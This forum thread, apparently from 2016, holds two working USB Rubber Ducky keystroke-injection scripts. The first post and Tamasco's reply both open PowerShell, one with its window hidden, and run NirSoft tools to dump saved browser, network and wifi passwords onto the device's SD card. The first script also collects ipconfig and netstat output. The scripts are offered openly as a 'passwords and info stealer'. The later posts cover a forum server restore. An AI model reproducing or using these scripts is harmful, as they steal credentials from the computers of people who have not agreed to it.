Borgirc Posted November 4, 2016 Share Posted November 4, 2016 hi guys and girls how can i fix my first script so it does not override the txt files ? dis is what i came up with sofare REM tnx 2 Hak5derren for the helpful videos and code ;-) REM Author Borgirc REM stored passwords and info stealer win 7 FOR TWIN DUCKY REM name the sd DUCKY and create a folder named passwords on the sd card REM it will store all the info in text files in the passwords folder on the sd card REM get WebBrowserPassView and netpass and WirelessKeyView at http://www.nirsoft.net REM copy WebBrowserPassView.exe + netpass.exe + WirelessKeyView on sd of the twin ducky DELAY 1000 GUI R DELAY 100 STRING POWERSHELL ENTER DELAY 1000 ALT F4 DELAY 100 STRING mode con:cols=18 lines=1 ENTER DELAY 100 STRING $usbpath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name ENTER DELAY 100 STRING CD $usbpath.name ENTER DELAY 100 STRING ./WebBrowserPassView /stext passwords/Password_MAIL.txt ENTER DELAY 100 STRING ./netpass /stext passwords/Password_PC.txt ENTER DELAY 100 STRING ./WirelessKeyView /stext passwords/wifi-pass.txt ENTER DELAY 100 STRING ipconfig /all | out-file passwords/ipconfig.txt ENTER DELAY 100 STRING netstat | out-file passwords/netstat.txt ENTER DELAY 100 STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
Tamasco Posted November 4, 2016 Share Posted November 4, 2016 My Webbrowserpassview payload looks like this, and it works great. You can also add subfolders. DELAY 2000 GUI R DELAY 100 STRING powershell -windowstyle hidden DELAY 100 ENTER DELAY 1000 STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name DELAY 100 ENTER STRING cd $usbPath.name DELAY 100 ENTER STRING $timestamp = $(get-date -f MM-dd-yyyy_HH_mm_ss) DELAY 100 ENTER STRING $hostname = hostname DELAY 100 ENTER STRING $path = "p_"+$hostname+"_"+$timestamp+".txt" DELAY 100 ENTER STRING ./p /stext $path DELAY 100 ENTER STRING exit DELAY 100 ENTER Quote Link to comment Share on other sites More sharing options...
Borgirc Posted November 5, 2016 Author Share Posted November 5, 2016 tnx m8 im gone play around with it i think this will fix my problem:-) Quote Link to comment Share on other sites More sharing options...
Borgirc Posted November 8, 2016 Author Share Posted November 8, 2016 where did my posts go m8ts ? Quote Link to comment Share on other sites More sharing options...
Decoy Posted November 8, 2016 Share Posted November 8, 2016 16 minutes ago, Borgirc said: where did my posts go m8ts ? Servers went down last night - and it looks like they had to restore from a backup. Quote Link to comment Share on other sites More sharing options...
Borgirc Posted November 10, 2016 Author Share Posted November 10, 2016 a ok tnx Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.